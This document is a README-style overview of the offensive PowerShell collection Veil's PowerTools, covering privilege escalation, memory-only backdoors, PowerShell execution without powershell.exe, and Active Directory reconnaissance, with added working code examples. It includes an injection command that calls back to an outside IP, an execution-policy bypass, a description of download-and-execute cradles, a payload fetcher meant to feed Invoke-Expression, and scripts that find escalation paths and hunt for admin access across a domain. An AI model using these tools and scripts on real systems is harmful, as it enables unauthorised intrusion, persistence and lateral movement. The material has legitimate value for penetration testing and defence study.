Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.
This collection contains five projects:
PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, vulnerable scheduled tasks (schtasks), and more.
Service Enumeration:
Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name
Get-ServiceFilePermission - returns services where the current user can write to the service binary path or its config
Get-ServicePermission - returns services the current user can modify

Service Abuse:
Invoke-ServiceUserAdd - modifies a modifiable service to create a user and add it to the local administrators
Invoke-ServiceCMD - executes an arbitrary command through service abuse
Write-UserAddServiceBinary - writes out a patched C# service binary that adds a local administrative user
Write-CMDServiceBinary - writes out a patched C# binary that executes a custom command
Write-ServiceEXE - replaces a service binary with one that adds a local administrator user
Write-ServiceEXECMD - replaces a service binary with one that executes a custom command
Restore-ServiceEXE - restores a replaced service binary with the original executable
Invoke-ServiceStart - starts a given service
Invoke-ServiceStop - stops a given service
Invoke-ServiceEnable - enables a given service
Invoke-ServiceDisable - disables a given service
Get-ServiceDetail - returns detailed information about a service
DLL Hijacking:
Find-DLLHijack - finds .dll hijacking opportunities for currently running processes
Find-PathHijack - finds service %PATH% .dll hijacking opportunities
Write-HijackDll - writes out a hijackable .dll

Registry Checks:
Get-RegAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set
Get-RegAutoLogon - checks for Autologon credentials in the registry
Get-VulnAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Misc Checks:
Get-VulnSchTask - finds scheduled tasks with modifiable target files
Get-UnattendedInstallFile - finds remaining unattended installation files
Get-Webconfig - checks for any encrypted web.config strings
Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords
Write-UserAddMSI - writes out an MSI installer that prompts for a user to be added
Invoke-AllChecks - runs all current escalation checks and returns a report
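The unquoted-service-path check is the first one most people run, so here is the logic behind it written out by hand. This is an added example, not PowerUp's own code: it assumes a Windows host with PowerShell 3 or later (for Get-CimInstance), and the function names are this example's own. Unlike a pure listing, it also enumerates the intermediate paths Windows actually tries and probes whether each directory is writable, which is the part that decides whether the finding is exploitable.

```powershell
# Added example (not PowerUp code): reproduce the check behind Get-ServiceUnquoted.
# Assumes a Windows host with PowerShell 3+ (Get-CimInstance).
function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    # A real create/delete probe is more reliable than interpreting the ACL by hand.
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if (-not $path) { return }
        $path = $path.Trim()
        # Quoted image paths resolve unambiguously; only unquoted ones are of interest.
        if ($path.StartsWith('"') -or $path.StartsWith("'")) { return }

        # Keep only the image path, dropping any service arguments after the .exe.
        $exeEnd = $path.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
        if ($exeEnd -lt 0) { return }
        $image = $path.Substring(0, $exeEnd + 4)
        if ($image -notmatch ' ') { return }

        # CreateProcess tries each space-delimited prefix as a candidate binary
        # ("C:\Program.exe", "C:\Program Files\Foo.exe", ...) before the real one.
        $parts = $image -split ' '
        for ($i = 0; $i -lt $parts.Count - 1; $i++) {
            $candidate = ($parts[0..$i] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            [pscustomobject]@{
                ServiceName   = $svc.Name
                RunsAs        = $svc.StartName
                StartMode     = $svc.StartMode
                ImagePath     = $image
                CandidatePath = $candidate
                DirWritable   = Test-DirectoryWritable -Path $dir
            }
        }
    }
}

# Only candidates the current user can plant a binary in matter for escalation;
# RunsAs and StartMode tell you what you gain and whether a reboot is needed.
Find-UnquotedServicePath | Where-Object DirWritable | Format-Table -AutoSize
```

A finding with DirWritable false is noise: the service is misconfigured, but nothing can be planted without further access. Conversely a service running as LocalSystem with an Auto start mode and a writable candidate directory is the case the Write-ServiceEXE family of functions above is built for.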
PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system. It focuses on diversifying the "trigger" methods, which gives the user flexibility in how to signal to the backdoor that it needs to phone home. PowerBreach focuses on memory-only methods that do not persist across a reboot without further assistance, and it is not a silver bullet when it comes to covert communications.
Add-PSFirewallRules - adds PowerShell to the firewall on 65K ports. Requires admin.
Invoke-CallbackIEX - the location for the various callback mechanisms. Calls back and executes the encoded payload.

Invoke-EventLogBackdoor - monitors for failed RDP login attempts. Admin: yes, Firewall: no, auditing required
Invoke-PortBindBackdoor - binds to a TCP port. Admin: no, Firewall: yes
Invoke-ResolverBackdoor - resolves a name to decide when to call back. Admin: no, Firewall: no
Invoke-PortKnockBackdoor - starts a sniffer looking for the trigger. Admin: yes, Firewall: yes
Invoke-LoopBackdoor - calls back on a set interval. Admin: no, Firewall: no
Invoke-DeadUserBackdoor - looks for a "dead" user and calls back when that user no longer exists. Admin: no, Firewall: no
Callback URIs Available:
http://<host:port/resource> - perform a standard HTTP callback
https://<host:port/resource> - perform a standard HTTPS callback
dnstxt://<host> - resolve the DNS TXT record for host; the record is the payload
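To make the three callback schemes concrete, the following added example (not PowerBreach's Invoke-CallbackIEX) fetches a payload for each scheme and returns it as text rather than executing it, so the retrieval path can be inspected before anything is run. It assumes the payload is base64 over UTF-8 script text and that the dnstxt scheme is served by the Resolve-DnsName cmdlet (DnsClient module, Windows 8 / Server 2012 and later); the host name in the usage line is a placeholder.

```powershell
# Added example (not PowerBreach code): resolve a callback URI to the decoded
# script it carries, without executing it.
function Get-CallbackPayload {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Uri)

    $encoded = switch -Regex ($Uri) {
        '^https?://' {
            # WebClient exists back to PowerShell 2 and throws on any non-2xx status.
            (New-Object System.Net.WebClient).DownloadString($Uri)
        }
        '^dnstxt://(?<host>[^/]+)$' {
            $records = Resolve-DnsName -Name $Matches.host -Type TXT -ErrorAction Stop |
                Where-Object { $_.Type -eq 'TXT' }
            if (-not $records) { throw "no TXT record for $($Matches.host)" }
            # Long payloads are split across strings and records; join them in order.
            ($records | ForEach-Object { $_.Strings }) -join ''
        }
        default { throw "unsupported callback URI: $Uri" }
    }

    # Strip whitespace the transport may have inserted, then decode.
    $encoded = $encoded -replace '\s', ''
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($encoded))
}

# Server-side counterpart, so a round trip can be checked before deployment.
function ConvertTo-CallbackPayload {
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Script))
}

# Usage (placeholder host): review the returned text, then pipe it to
# Invoke-Expression yourself once you are satisfied with what it does.
# $script = Get-CallbackPayload -Uri 'dnstxt://payload.example.test'
# $script
```

Keeping fetch and execute as separate steps is deliberate: it lets you confirm the TXT record or web resource actually holds what you staged, and it is the same split a defender can use to pull and inspect a suspected payload without running it.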
PowerPick focuses on allowing the execution of PowerShell functionality without the use of powershell.exe. Primarily this project uses .NET assemblies/libraries to start execution of the PowerShell scripts.
Many thanks to those in the offensive PowerShell community. This work is not groundbreaking, but hopefully it will motivate both offense and defense to understand the implications and the lack of protections available.
PSInject provides a PowerShell script (psinject.ps1) which implements the Invoke-PSInject function. This script is based on PowerSploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL. It allows for the replacement of the callback URL that is hard-coded into the DLL. See the script for more details.
The script that it calls back for must be base64 encoded. To do this, you can simply use the built-in Linux utility base64.
Import-Module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://220.127.116.11/favicon.ico
ReflectivePick is a reflective DLL based on Stephen Fewer's method. It imports and runs a .NET assembly in its memory space that supports running PowerShell code using System.Management.Automation. Due to its reflective property, it can be injected into any process using a reflective injector and allows the execution of PowerShell code by any process, not just powershell.exe. It extends inject/migrate capabilities into PowerShell.
This DLL is meant to be used with PSInject.ps1, which provides the ability to modify the hard-coded callback URL, or with Metasploit after compiling or patching the URL manually.
SharpPick is a .NET executable which allows execution of PowerShell code through a number of methods. The script can be embedded as a resource, read from a URL, appended to the binary, or read from a file. It was originally used as a proof of concept to demonstrate/test the blocking of PowerShell and the bypass of AppLocker.
sharppick.exe [<flag> <argument>]
flags:
-f <file> : read script from the specified file
-r <resource name> : read script from the specified embedded resource
-d <url> : read script from a URL
-a <delimiter> : read script appended to the current binary after the specified delimiter. The delimiter should be a very, very unique string
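The -a method deserves a closer look, because the "very unique" delimiter requirement is a correctness condition rather than advice. The added example below (this page's own illustration, not SharpPick's source) shows both sides of it in PowerShell: appending a script after a delimiter, and reading it back the way a self-reading binary must. The function names and the delimiter are this example's own; the check that the delimiter does not already occur in the binary or the script is the one that matters, since the reader locates the last occurrence.

```powershell
# Added example (not SharpPick code): the "appended script" method from both sides.
function Find-LastByteSequence {
    param([byte[]]$Haystack, [string]$Needle)
    # Latin-1 maps every byte to one char, so a string search gives the byte offset
    # directly and runs far faster than a byte-by-byte loop in PowerShell.
    $latin1 = [Text.Encoding]::GetEncoding(28591)
    $latin1.GetString($Haystack).LastIndexOf($Needle, [StringComparison]::Ordinal)
}

function Add-AppendedScript {
    param(
        [Parameter(Mandatory)][string]$BinaryPath,
        [Parameter(Mandatory)][string]$ScriptPath,
        [Parameter(Mandatory)][string]$Delimiter
    )
    $binary = [IO.File]::ReadAllBytes($BinaryPath)
    $script = [IO.File]::ReadAllBytes($ScriptPath)
    if ((Find-LastByteSequence -Haystack $binary -Needle $Delimiter) -ge 0) {
        throw "delimiter already occurs inside $BinaryPath; pick a more unique one"
    }
    if ((Find-LastByteSequence -Haystack $script -Needle $Delimiter) -ge 0) {
        throw "delimiter occurs inside the script; the reader would truncate it"
    }
    $delim = [Text.Encoding]::ASCII.GetBytes($Delimiter)
    [IO.File]::WriteAllBytes($BinaryPath, [byte[]]($binary + $delim + $script))
}

function Get-AppendedScript {
    param(
        [Parameter(Mandatory)][string]$BinaryPath,
        [Parameter(Mandatory)][string]$Delimiter
    )
    $bytes = [IO.File]::ReadAllBytes($BinaryPath)
    $at = Find-LastByteSequence -Haystack $bytes -Needle $Delimiter
    if ($at -lt 0) { throw "delimiter not found in $BinaryPath" }
    $start = $at + [Text.Encoding]::ASCII.GetByteCount($Delimiter)
    [Text.Encoding]::UTF8.GetString($bytes, $start, $bytes.Length - $start)
}

# Round trip on a constructed dummy "binary" (random bytes) in the temp directory.
$bin   = Join-Path $env:TEMP 'dummy.bin'
$ps1   = Join-Path $env:TEMP 'payload.ps1'
$delim = 'X9q7-delim-' + [Guid]::NewGuid().ToString('N')
[IO.File]::WriteAllBytes($bin, [byte[]](1..4096 | ForEach-Object { Get-Random -Maximum 256 }))
Set-Content -Path $ps1 -Value 'Get-Date; $env:COMPUTERNAME' -Encoding UTF8
Add-AppendedScript -BinaryPath $bin -ScriptPath $ps1 -Delimiter $delim
Get-AppendedScript -BinaryPath $bin -Delimiter $delim   # returns the script text
```

Appending bytes after the end of a PE does not disturb its headers or sections, which is why the loader still runs the binary; it does change the file hash, so any allow-listing keyed on hash rather than on publisher or path will flag the modified copy.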
More SharpPick details here
PewPewPew contains scripts that use a common pattern: host a script on a PowerShell web server, invoke the IEX download cradle on targets to download and execute the target code and post the results back to the server, and then post-process any results.
More details here
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows "net *" commands, which use PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
It also implements various useful meta-functions, including some custom-written user-hunting functions which identify where on the network specific users are logged in. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See the function descriptions for appropriate usage and available options.
To run on a machine, start PowerShell with "powershell -exec bypass" and then load the PowerView module with:
PS> Import-Module .\powerview.psm1
or load the PowerView script by itself:
PS> Import-Module .\powerview.ps1
For detailed output of underlying functionality, pass the -Debug flag to most functions.
For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.
Misc Functions:
Export-PowerViewCSV - thread-safe CSV append
Set-MacAttribute - sets MAC attributes for a file based on another file or input (from PowerSploit)
Copy-ClonedFile - copies a local file to a remote location, matching MAC properties
Get-IPAddress - resolves a hostname to an IP
Test-Server - tests connectivity to a specified server
Convert-NameToSid - converts a given user/group name to a security identifier (SID)
Convert-SidToName - converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical - converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy - enumerates local proxy settings
Get-PathAcl - gets the ACLs for a local/remote file path with optional group recursion
Get-UserProperty - returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty - returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile - searches a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess - checks if the current user context has local administrator access to a specified host
Get-DomainSearcher - builds a proper ADSI searcher object for a given domain
Get-ObjectAcl - returns the ACLs associated with a specific Active Directory object
Add-ObjectAcl - adds an ACL to a specified Active Directory object
Invoke-ACLScanner - enumerates 1000+ modifiable ACLs on a specified domain
Get-GUIDMap - returns a hash table of current GUIDs -> display names
Get-DomainSID - returns the SID for the specified domain
Invoke-ThreadedFunction - helper that wraps threaded invocation for other functions
net * Functions:
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomain - gets all domains for the current forest
Get-NetDomainController - gets the domain controllers for the current computer's domain
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser - adds a local or domain user
Get-NetComputer - gets a list of all current servers in the domain
Get-NetPrinter - gets an array of all current printer objects in a domain
Get-NetOU - gets data for domain organizational units
Get-NetSite - gets current sites in a domain
Get-NetSubnet - gets registered subnets for a domain
Get-NetGroup - gets a list of all current groups in a domain
Get-NetGroupMember - gets a list of all current users in a specified domain group
Get-NetLocalGroup - gets the members of a local group on a remote host or hosts
Add-NetGroupUser - adds a local or domain user to a local or domain group
Get-NetFileServer - gets a list of file servers used by current domain users
Get-DFSshare - gets a list of all distributed file system shares on a domain
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSession - gets active sessions on a specified server
Get-NetRDPSession - gets active RDP sessions for a specified server (like qwinsta)
Get-LastLoggedOn - returns the last logged-on user for a target host
Get-NetProcess - gets the remote processes and their owners on a remote server
Get-UserEvent - returns logon or TGT events from the event log for a specified host
Get-ADObject - takes a domain SID and returns the user, group, or computer object associated with it
Set-ADObject - takes a SID, name, or SamAccountName to query for a specified domain object, and then sets a specified 'PropertyName' to a specified 'PropertyValue'

GPO Functions:
Get-GptTmpl - parses a GptTmpl.inf to a custom object
Get-NetGPO - gets all current GPOs for a given domain
Get-NetGPOGroup - gets all GPOs in a domain that set "Restricted Groups" on target machines
Find-GPOLocation - takes a user/group and finds the machines they have effective rights over through GPO enumeration and correlation
Find-GPOComputerAdmin - takes a computer and determines who has admin rights over it through GPO enumeration
Get-DomainPolicy - returns the default domain or DC policy

User-Hunting Functions:
Invoke-UserHunter - finds machines on the local domain where specified users are logged in, and can optionally check if the current user has local admin access to the found machines
Invoke-StealthUserHunter - finds all file servers used in user HomeDirectories and checks the sessions on each file server, hunting for particular users
Invoke-ProcessHunter - hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter - hunts for user logon events in domain controller event logs
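The "pure-PowerShell replacements" above rest on one building block: a DirectorySearcher built from the domain's DNS name, with no dependency on RSAT or the ActiveDirectory module. The following added example (this page's own illustration, not PowerView's code) shows that pattern, in the spirit of Get-DomainSearcher and Get-NetUser. It assumes a domain-joined session, defaults to the current user's domain, and uses function names of its own; the AdminSDHolder filter and the LDAP escaping are the two details a hand-rolled version usually gets wrong.

```powershell
# Added example (not PowerView code): raw ADSI search, no AD module required.
function New-DomainSearcher {
    param(
        [string]$Domain,
        [string]$Filter = '(objectClass=*)',
        [string[]]$Properties
    )
    if (-not $Domain) {
        $Domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Name
    }
    # Derive the search base from the DNS name: corp.example.test -> DC=corp,DC=example,DC=test
    $base = 'LDAP://' + (($Domain -split '\.' | ForEach-Object { "DC=$_" }) -join ',')
    $searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$base)
    $searcher.Filter   = $Filter
    $searcher.PageSize = 200          # paging avoids the server-side 1000-result cap
    if ($Properties) { $searcher.PropertiesToLoad.AddRange($Properties) }
    return $searcher
}

function Get-ResultProperty {
    # Absent attributes must not throw; return $null for those.
    param($Result, [string]$Name)
    if ($Result.Properties.Contains($Name) -and $Result.Properties[$Name].Count) {
        return $Result.Properties[$Name]
    }
}

function Get-DomainUser {
    param(
        [string]$UserName = '*',
        [string]$Domain,
        [switch]$AdminCount           # only accounts protected by AdminSDHolder
    )
    # Escape LDAP metacharacters in the supplied name; '*' is kept as a wildcard.
    $escaped = $UserName -replace '\\', '\5c' -replace '\(', '\28' -replace '\)', '\29'
    $filter = "(&(samAccountType=805306368)(samAccountName=$escaped)"
    if ($AdminCount) { $filter += '(admincount=1)' }
    $filter += ')'
    $props = 'samaccountname','displayname','description','memberof','lastlogontimestamp'
    $searcher = New-DomainSearcher -Domain $Domain -Filter $filter -Properties $props

    foreach ($r in $searcher.FindAll()) {
        $lastLogon = Get-ResultProperty $r 'lastlogontimestamp'
        [pscustomobject]@{
            SamAccountName = [string](Get-ResultProperty $r 'samaccountname')
            DisplayName    = [string](Get-ResultProperty $r 'displayname')
            Description    = [string](Get-ResultProperty $r 'description')   # often holds passwords
            LastLogon      = if ($lastLogon) { [DateTime]::FromFileTime([int64]$lastLogon[0]) }
            MemberOf       = @(Get-ResultProperty $r 'memberof')
        }
    }
}

# Usage examples:
# Get-DomainUser -UserName 'svc*' | Format-Table SamAccountName, Description, LastLogon
# Get-DomainUser -AdminCount | Select-Object -ExpandProperty SamAccountName
```

samAccountType 805306368 selects user objects without the cost of the objectCategory/objectClass pair, and because lastLogonTimestamp is replicated it is safe to read from any DC, at the price of being up to 14 days stale.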
Domain Trust Functions:
Get-NetDomainTrust - gets all trusts for the current user's domain
Get-NetForestTrust - gets all trusts for the forest associated with the current user's domain
Find-ForeignUser - enumerates users who are in groups outside of their principal domain
Find-ForeignGroup - enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust - tries to build a relational mapping of all domain trusts

Meta Functions:
Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to
Find-UserField - searches a user field for a particular term
Find-ComputerField - searches a computer field for a particular term
Get-ExploitableSystem - finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators group across all machines in the domain
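Find-LocalAdminAccess and Invoke-CheckLocalAdminAccess both come down to one Win32 call: opening the remote Service Control Manager with SC_MANAGER_ALL_ACCESS, which succeeds only for local administrators. The added example below (this page's own illustration, not PowerView's implementation) shows that check, and separates "reachable but not admin" from "unreachable", which a bare true/false hides. It assumes Add-Type is available (no constrained language mode); the host names in the usage line are placeholders.

```powershell
# Added example (not PowerView code): local admin check via OpenSCManager.
Add-Type @'
using System;
using System.Runtime.InteropServices;
public static class ScmNative {
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern IntPtr OpenSCManagerW(string machineName, string databaseName, uint desiredAccess);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool CloseServiceHandle(IntPtr handle);
}
'@

function Test-LocalAdminAccess {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$ComputerName)
    process {
        $SC_MANAGER_ALL_ACCESS = 0xF003F
        $handle = [ScmNative]::OpenSCManagerW("\\$ComputerName", $null, $SC_MANAGER_ALL_ACCESS)
        # Read the error immediately; any later call may overwrite it.
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        $isAdmin = $handle -ne [IntPtr]::Zero
        if ($isAdmin) { [void][ScmNative]::CloseServiceHandle($handle) }

        # 5 = ERROR_ACCESS_DENIED (host reachable, caller is not a local admin)
        # 53 = ERROR_BAD_NETPATH, 1722 = RPC_S_SERVER_UNAVAILABLE (host unreachable / RPC blocked)
        $status = if ($isAdmin) { 'Admin' }
                  elseif ($err -eq 5) { 'NotAdmin' }
                  else { "Unreachable($err)" }

        [pscustomobject]@{
            ComputerName = $ComputerName
            LocalAdmin   = $isAdmin
            Status       = $status
        }
    }
}

# Usage (placeholder hosts): feed names from any source, e.g. a Get-NetComputer result.
# 'srv01','srv02' | Test-LocalAdminAccess | Where-Object LocalAdmin
```

Nothing is created or changed on the target: only an SCM handle is opened and closed. It still leaves a trace, since a successful open shows up as a network logon (event 4624, logon type 3) on the remote host, and a denied one as a 4625, so a sweep across the domain is visible to anyone watching for a single account generating logons on many machines in a short window.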